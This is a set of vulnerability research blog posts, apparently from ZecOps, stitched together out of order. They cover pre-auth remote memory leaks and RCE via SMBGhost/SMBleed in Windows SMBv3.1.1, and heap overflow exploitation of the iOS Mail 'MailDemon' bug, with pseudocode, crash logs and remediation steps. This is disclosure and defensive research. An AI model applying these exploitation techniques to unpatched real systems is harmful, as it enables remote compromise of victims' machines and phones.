ZecOps classify forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities, that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.
Remediation
You can remediate the impact of both issues by doing one of the following:
Applying the latest security issues (recommended)
Block port 445 / enforce host-isolation
Disable SMBv3.1.1 compression
Summary
This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:
A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in the modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows to leak parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for an unauthenticated RCE exploitation, the first thing we looked for is a way to read memory unauthenticated.
Diving into SMB
Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.
The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.
After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:
If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.
We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:
The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.
A closer look at SMB2 SESSION_SETUP
As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.
The NTLM Authenticate message
After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLM2 V2 Response structure. It’s a variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) parameter is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks are verifying the AvPairs field.
The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.
The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.
At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:
The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:
length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.
According to the server response we can deduce the answer to our question.
So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.
Observation #1: Lookaside lists
As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.
The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:
→ Allocation size
↓ Logical Processor
0x1100
0x2100
0x4100
0x8100
0x10100
0x20100
0x40100
0x80100
0x100100
Processor 1
Processor 2
…
…
Processor n
Each cell with the “” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.
Observation #2: Failing the decompression
Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):
In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:
Back to the NTLM Authenticate message
We can use the above observations to make our technique work by using two steps:
Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.
This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.
Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.
Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.
Overcoming the offset limitation
Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.
The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.
Address leak POC
You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.
A different approach – decompression
While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.
Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.
We accomplished that by sending a valid packed which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):
There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:
length <= y: In this case the whole compressed block will consist out of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.
Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:
Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.
Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the initialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out of bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.
The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation, it required sending a large number of packets, hurting performance and stability.
ZecOps Detection
ZecOps classify forensics logs related to this issue as the following tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.
Remediation
You can remediate the impact of both issues by doing one of the following:
Applying the latest security issues (recommended)
Block port 445 / enforce host-isolation
Disable SMBv3.1.1 compression
Part II – Summary
In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.
While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
SMBleed allows to leak kernel memory remotely.
Combined with SMBGhost, which was patched three months ago, SMBleed allows to achieve pre-auth Remote Code Execution (RCE).
POC #1: SMBleed remote kernel memory read: POC #1 Link
POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link
Introduction
The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver. Below is a simplified version of the function, with the irrelevant details omitted:
The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.
The SMBGhost bug happened due to lack of integer overflow checks. It was fixed by Microsoft and even though we didn’t add it to our function to keep it simple, this time we will assume that the function checks for integer overflows and discards the message in these cases. Even with these checks in place, there’s still a serious bug. Can you spot it?
Faking OriginalCompressedSegmentSize again
Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:
The uninitialized kernel data is going to be treated as a part of our message.
If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:
Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:
NTSTATUS SmbCompressionDecompress(
USHORT CompressionAlgorithm,
PUCHAR UncompressedBuffer,
ULONG UncompressedBufferSize,
PUCHAR CompressedBuffer,
ULONG CompressedBufferSize,
PULONG FinalCompressedSize)
{
// ...
NTSTATUS Status = RtlDecompressBufferEx2(
...,
FinalUncompressedSize,
...);
if (status >= 0) {
*FinalCompressedSize = CompressedBufferSize;
}
// ...
return Status;
}
In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only this seemingly unnecessary, deliberate update of the FinalCompressedSize value made the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.
Basic exploitation
The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:
Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.
Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrinowe saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.
Here’s a summary of the affected Windows versions with the relevant updates installed:
Windows 10 Version 2004
Update
SMBGhost
SMBleed
KB4557957
Not Vulnerable
Not Vulnerable
Before KB4557957
Not Vulnerable
Vulnerable
Windows 10 Version 1909
Update
SMBGhost
SMBleed
KB4560960
Not Vulnerable
Not Vulnerable
KB4551762
Not Vulnerable
Vulnerable
Before KB4551762
Vulnerable
Vulnerable
Windows 10 Version 1903
Update
Null Dereference Bug
SMBGhost
SMBleed
KB4560960
Fixed
Not Vulnerable
Not Vulnerable
KB4551762
Fixed
Not Vulnerable
Vulnerable
KB4512941
Fixed
Vulnerable
Vulnerable
None of the above
Not Fixed
Vulnerable
Potentially vulnerable*
* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)
SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE
Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC.
ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis, a network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at [email protected] for more information.
Remediation
You can remediate both SMBleed and SMBGhost by doing one or more of the following things:
Windows update will solve the issues completely (recommended)
Blocking port 445 will stop lateral movements using these vulnerabilities
Enforcing host isolation
Disabling SMB 3.1.1 compression (not a recommended solution)
Shout out to Chompie that exploited this bug with a different technique. Chompie’s POC is available here.
Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5.
Our analysis concluded that the patches are different, and that iOS 13.4.5 beta patch was incomplete and could be still vulnerable under certain circumstances.
Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices.
This may explain why it took about one month for a full patch to be released.
iOS 13.4.5 beta patch
The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.
The function -[MFMutableData appendBytes:length:] raises an exception if -[MFMutableData _mapMutableData] returns false.
In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:
When mmap fails it returns False, but still allocates a 8-bytes chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.
The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes which will be an 8-bytes chunk if mmap fails, these functions do not check if mmap fails or not since the patch only affects -[MFMutableData appendBytes:length:].
Following is an actual backtrace taken from MobileMail:
Since the bytes returned by mutableBytes is usually considered to be modifiable given following from Apple’s documentation:
This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use The bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.
Apple’s documentation
Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] returns self->bytes points to the 8-bytes chunk if mmap fails, which might lead to heap overflow under some circumstances.
The following is an example of how things could go wrong, the heap overflow still would happen even if it checks length before memcpy:
size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes];//mbytes could be a 8-bytes chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
memcpy(mbytes, new_data, new_data_len);//heap overflow if mmap fails
}
iOS 13.5 Patch
Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData] ”, right after mmap fails and it doesn’t return the 8-bytes chunk anymore. This approach fixes the issue completely.
Summary
iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete.
At ZecOps we help developers to find security weaknesses, and validate if the issue was correctly solved automatically. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program. If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.
We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
Present two new examples of in-the-wild triggers so you can judge by yourself if these bugs worth an out of band patch
Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
Launching a bounty program for people who have traces of attacks with total bounties of $27,337
MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3
Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.
ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.
At present, we already have the following:
Remote heap-overflow in Mail application
Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
Ability to alter code execution
Kernel Elevation of Privileges 0day
What we don’t have:
An infoleak – but therein rests a surprise: an infoleak is not mandatory to be in Mail since an infoleak in almost any other process would be sufficient. Since dyld_shared_cache is shared through most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail, for example CVE-2019-8646 of iMessage can do the trick remotely as well – which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.
Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious in chaining this together because:
We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
We haven’t seen exploitation in the wild for the LPE.
We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions.
were you targeted by this vulnerability?
MailDemon Bounty
Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.
Exploiting MailDemon
As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.
Heap Spray & Heap Grooming Technique
In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.
The following is a partial crash log generated while testing our POC:
Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region. Bytes after previous region: 16045690973559045872
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
MALLOC_NANO 0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV
--->
UNUSED SPACE AT END
Thread 18 name: Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0 ??? 0xdeadbeefdeadbeef 0 + -2401053088876216593
1 libdispatch.dylib 0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp + 612
2 libdispatch.dylib 0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp + 480
3 libdispatch.dylib 0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp + 1960
4 libdispatch.dylib 0x00000001b773b4ac _dispatch_workloop_worker_thread + 596
5 libsystem_pthread.dylib 0x00000001b796a114 _pthread_wqthread + 304
6 libsystem_pthread.dylib 0x00000001b796ccd4 start_wqthread + 4
Thread 18 crashed with ARM Thread State (64-bit):
x0: 0x0000000281606300 x1: 0x00000001e4b97b04 x2: 0x0000000000000004 x3: 0x00000001b791df30
x4: 0x00000002827e81c0 x5: 0x0000000000000000 x6: 0x0000000106e5af60 x7: 0x0000000000000940
x8: 0x00000001f14a6f68 x9: 0x00000001e4b97b04 x10: 0x0000000110000ae0 x11: 0x000000130000001f
x12: 0x0000000110000b10 x13: 0x000001a1f14b0141 x14: 0x00000000ef02b800 x15: 0x0000000000000057
x16: 0x00000001f14b0140 x17: 0xdeadbeefdeadbeef x18: 0x0000000000000000 x19: 0x0000000108e68038
x20: 0x0000000108e68000 x21: 0x0000000108e68000 x22: 0x000000016ff3f0e0 x23: 0xa3a3a3a3a3a3a3a3
x24: 0x0000000282721140 x25: 0x0000000108e68038 x26: 0x000000016ff3eac0 x27: 0x00000002827e8e80
x28: 0x000000016ff3f0e0 fp: 0x000000016ff3e870 lr: 0x00000001b6f3db9c
sp: 0x000000016ff3e400 pc: 0xdeadbeefdeadbeef cpsr: 0x60000000
The ideal primitive for heap spray in this case is a memory leak bug that can be triggered from remote, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such primitive could qualify for up to $7,337 bounty from ZecOps (read more below).
Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.
Trigger
An oversized email is capable of reproducing the vulnerability as a PoC(see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]“
-[MFMutableData appendBytes:length:]
{
int old_len = [self length];
//...
char* bytes = self->bytes;
if(!bytes){
bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
}
copy_dst = bytes + old_len;
//...
memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}
The destination address of memove is ”bytes + old_len” instead of’ ‘bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value so that the destination address will end up in a invalid address which is beyond the edge of this region and crash immediately, given that the size of MALLOC_NANO region is 512MB.
In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.
Noteworthy, the “padding” doesn’t mean the overflow address is completely random, the “padding” is predictable by hardware models since the RAM size is the same, and mmap is usually failed at the same size during our tests.
Crash analysis
This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.
Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.
Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.
Case 1
The following crash was triggered right inside the vulnerable function while the overflow happens.
With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” is an invalid address at first place which is 0x4a35630e.
So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address.
Turns out that the process crashed when after failing to mmap a file and then failing to allocate the 8 byte memory at the same time.
The invalid address 0x4a35630e is actually the offset which is the length of MFMutableData before triggering the vulnerability(i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”.
In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.
Please note that x8-x15, and x0 are fully controlled by the sender.
The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.
A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!
Vulnerable version: iOS 3.1.3 on iPhone 2G Time of crash: 22nd of October, 2010
The user “shyamsandeep”, registered on the 12th of June 2008 and last logged in on the 16th of October 2011 and had a single post in the forum, which contained this exact trigger.
This crash had r0 equal to 0x037ea000, which could be the result of the 1st vulnerability we disclosed in our previous blog which was due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be a result of the allocation of 8-bytes memory failure however it is not possible to determine the exact reason since the log lacked memory regions information. Nonetheless, it is certain that there were triggers in the wild for this exploitable vulnerability since 2010.
[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode.
[b] is one of the instructions around the crashed address we’ve added for better understanding, the process crashed on instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one the objects.
By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.
Let’s take a look at the virtual memory region information of x28: 0x0000000282693330, the overwritten object was stored in MALLOC_NANO region which stores small heap chunks. The heap overflow vulnerability corrupts the same region since it overflows on a 8-bytes heap chunk which is also stored in MALLOC_NANO.
This crash is actually pretty close to controlling the PC since it controls the pointer of an Objective-C object. By pointing the value of register x0 to a memory sprayed with a fake object and class with fake method cache, the attackers could control the PC pointer, this phrack blog explains the details.
Summary
It is rare to see that user-provided inputs trigger and control remote vulnerabilities.
We prove that it is possible to exploit this vulnerability using the described technique.
We have observed real world triggers with a large allocation size.
We have seen real world triggers with values that are controlled by the sender.
The emails we looked for were missing / deleted.
Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
In our opinion, based on the above, this bug is worth an out of band patch.
How Can Apple Improve the Logs?
The lack of details in iOS logs and the lack of options to choose the granularity of the data for both individuals and organizations need to change to get iOS to be on-par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it, is completely flawed and should not be the normal way to do it.
We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:
Crashes improvement: Enable to see memory next to each pointer / register
Crashes improvement: Show stack / heap memory / memory near registers
Add PIDs/PPIDs/UID/EUID to all applicable events
Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.
Questions for Apple
How many triggers have you seen to this heap overflow since iOS 3.1.3?
How were you able to determine within one day that all of the triggers to this bug were not malicious and did you actually go over each event ?
When are you planning to patch this vulnerability?
What are you going to do about enhancing forensics on mobile devices (see the list above)?
MailDemon Bounty
If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address [email protected]– there are instructions at the bottom of this post.
Suspected emails may appear as follows:
Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:
$10,000 USD bounty
One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year.
We will provide an additional bounty of up to $7,337 for exploit primitive as described above.
